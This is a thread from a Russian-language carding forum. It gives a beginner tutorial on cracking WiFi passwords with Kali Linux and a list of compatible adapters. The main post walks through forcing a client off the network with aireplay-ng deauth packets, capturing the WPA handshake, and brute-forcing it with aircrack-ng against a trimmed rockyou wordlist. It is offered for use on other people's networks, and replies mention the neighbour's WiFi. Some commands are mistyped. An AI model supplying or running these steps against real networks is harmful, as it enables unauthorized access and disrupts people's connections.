Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Взлом WiFi для новичков и чайников

EMIIbIPb

Участник клуба
Регистрация
23 Май 2018
Сообщения
43
Реакции
1
Тема не новая, но авторская. Просьба "бывалых" не кидаться тапками. Этот мануал для тех, кто ничего не смыслит программировании, но хочет похвастаться перед друзьям, что он великий хацкер. Простым язяком, без страшных треминов.

В чем суть?​
Мы будем обрывать от соединения человека, он будет занового авторизовываться, а мы перехватывать его зашифрованный пароль и, соответсвенно, расшифровывать его.

Итак, нам потребуется Kali Linux.. и всё. (как установить Kali Linux, вы в гугле и сами прекрасно найдете. К слову, многие советуют устанавливать на виртуальной машине - не рекомендую, многие функции будут работать коряво или вовсе не будут работать, либо придется потратить хреново тучу времени на отладку. Я делал загрузочную флешку / Live систему, названий много, но статья не об этом. Вбиваете в гугл: "установить кали линукс на флешку" - полно инструкций.)

Если вы сидите с ПК, а не с ноута, то может понадобится также внешний WiFi адаптер / USB WiFi адаптер.
Чтобы упростить вам задачу вот списочек.
USB Wi-Fi адаптеры с поддержкой режима монитора и беспроводных инъекций (100% совместимые с Kali Linux на конец мая 2020 года):


Списочек адаптеров:

Alfa AWUS1900 (chipset: Realtek RTL8814AU)
Alfa AWUS036ACH (chipset: Realtek RTL8812AU)

Alfa AWUS036H (Realtek RTL8187L)

Alfa AWUS036AC (chipset: Realtek RTL8812AU)

Alfa AWUS036NH (chipset: Ralink RT3070)

Alfa AWUS036NEH (chipset: Ralink RT3070)

Alfa AWUS036NHA (chipset: Atheros AR9271)

Alfa AWUS051NH (rev v2, chipset: Ralink RT3572)

Alfa AWUS052NH (chipset: Ralink RT3572)

TP-LINK Archer T9UH (chipset: Realtek RTL8814AU)

TP-LINK Archer T4UH (rev V2, chipset: Realtek RTL8812AU)

TP-LINK Archer T4U (rev V3, chipset: Realtek RTL8812AU)

TP-LINK TL-WN823N (rev v1, chipset: Realtek RTL8192CU)

TP-LINK TL-WN822N (rev v3, chipset: Realtek RTL8192CU)

TP-LINK TL-WN821N (rev v4, chipset: Realtek RTL8192CU)

TP-LINK TL-WN821N (rev v3, chipset: Atheros AR9287)

TP-LINK TL-WN727N (rev v3, chipset: Ralink RT5370)

TP-LINK TL-WN322G (ZyDAS ZD1211B)

TP-LINK TL-WN322G (rev v3, Atheros AR9271)

TP-LINK TL-WN422G/NC (rev v1, ZyDAS ZD1211B)

TP-LINK TL-WN422G/NC (rev v2, Atheros AR9271)

TP-LINK TL-WN7200ND (rev v1, Ralink RT3070)

TP-LINK TL-WN721N/NC (rev v1, Atheros AR9271)

TP-LINK TL-WN722N/NC (rev v1, Atheros AR9271)

TP-LINK TL-WN722N/NC (rev v2, Atheros AR9271)

TP-LINK TL-WN727N (rev v1, Ralink RT3070)

TP-LINK TL-WN727N (rev v3, Ralink RT5370)

TP-LINK TL-WN821N (rev v2, Atheros AR9170)

TP-LINK TL-WN821N (rev v3, Atheros AR7010)

TP-LINK TL-WN821N (rev v4, Realtek RTL8192CU)

TP-LINK TL-WN822N (rev v1, Atheros AR9170)

TP-LINK TL-WN822N (rev v2, Atheros AR7010)

(у меня имеется TP-LINK TL-WN722N/NC (rev v2, Atheros AR9271), но я обошелся и без него. Он достаточно дешевый: новый - 600 руб, б/у - 300 руб)

Открываем терминал:​
(я работаю под правами администратора / root)
Если вы авторизовались как обычный пользователь "kali", то нужно перейти на root, пишем в терминале коианду:
sudo passwd root
Далее придумываем новый пароль (не пугайтесь, если в терминале будет ничего писаться, все нормально, так задумано.)
Нажимаем Enter.
Повторяем пароль.
Нажимаем Enter.
Переводим компьютер в спящий режим / закрываем крышку ноута / блокируем экран(в правом верхнем углу есть значок замка).
Появляется экран блокировки, где нужно ввести логин-пароль. Логин у нас root, пароль вы сами придумали.


Смотрим имя беспроводного интерфейса:
iwconfig


Что высвечивается:
lo no wireless extensions.
eth0 no wireless extensions.

wlan0 IEEE 802.11 ESSID:"HUAWEI Y511-U30"
Mode:Managed Frequency:2.412 GHz Access Point: 92:4E:2B:FA:F6:A1
Bit Rate=52 Mb/s Tx-Power=14 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
Link Quality=60/70 Signal level=-50 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:9 Invalid misc:45 Missed beacon:0

Итак, моё устройство именуется как "wlan0"


Начинается самое интересное​
все пояснения пишу в квадратных скобках, вместо них пишите свои значения.

Переводим беспроводную карту в режим мониторинга + убивается сеть:
airmon-ng check kill

airmon-ng start wlan0
(Тут смотрим,имя интерфейса может смениться, у меня сменилось на wlan0mon)

airodump-ng wlan0mon
(появляются сведения о всех сетях поблизости)

BSSID — MAC адрес WI-Fi точки
CH — Номер канала точки доступа.
ESSID — Название/имя точки WI-Fi
STATION —MAC адрес юзеров, подключившихся к конкретной сети

Ctrl+C - остановка


Начинаем мониторить одну сеть:
(все данные о точке есть в таблице у вас в терминале, смотрите)

airodump[/B]-ng --bssid [MAC-адрес точки доступа / BBSID] --channel [Номер канала точки] -w [Путь до файла, куда будет записан хендшейк] [имя интерфейса]
(необходимо заранее создать файл куда будет записать наш зашифрованный пароль)

Открываем ещё один терминал.​
Насильно выбрасываем юзера из сети, чтобы он автоматически перелогинился:
aireplay-ng --deauth 20 -a [MAC-адрес точки / BBSID]-c [MAC-адрес клиента/STATION] [имя интерфейса]
( в строке состояния в первом терминале появится "handshake - значит, зашифрованный пароль перехвачен)

Чистим хендшейк:
wpaclean [Путь к Новому файлу] [Путь к Старому файлу]
(Новый файл создаем заранее. Обратите внимание, что у вас появилось несколько новых файлов, в качестве Старого нас интересует файл, у которого на конце "01-cap")

Пароль мы нашли, но он зашифрован, а знаем мы лишь хэндшейк от него. Этого достаточно. Теперь прога с помощью словаря переберет все возможные пароли и найдет валидный.

Создаем словарь:​
( в кали линукс уже заложен потрясный словарь для взлома чего угодно, но он огромен, поэтому вызовем его и сократим под наши нужды)

cp /usr/share/wordlists/rockyou.txt.gz .

gunzip rockyou.txt.gz

cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

Включаем перебор пароля/ Взламываем сеть:
airckreck-ng -w [путь к словарю, поищите, блокнотик должен появиться где-то в папках, обычно в папке "рут", называется "newrockyou.txt"] -b [MAC-адрес точки/ BBSID] [путь к чистому хендшейку- это наш очищенный файл, он видоизменился, но остался на месте]


ГОТОВО​
(пароль/ключ появится)

Не забудьте в конце выключить прогу, восстановить работу сетевой карты:
airmon-ng stop wlan0mon
 

JonySnipe

Опытный user
Регистрация
20 Мар 2018
Сообщения
61
Реакции
2
А я думал будет чето вроде такова.
Качаем Router Scan
Пихаим ip:port
Жмякаем старт
Ждем
Если ничо не вышло забиваем член и переходим к чтению твоей сттьи)
 

EMIIbIPb

Участник клуба
Регистрация
23 Май 2018
Сообщения
43
Реакции
1
Вариантов как добраться до вай фая соседа уйма. Это один из возможных)
 

hui_v_reduzah

Опытный user
Регистрация
11 Янв 2021
Сообщения
1,155
Реакции
14
щас соседский wi-fi взломаю
 

I_LOVE_18+

Участник клуба
Регистрация
7 Июл 2020
Сообщения
1,263
Реакции
14
Нихуя не понял
 
Сверху Снизу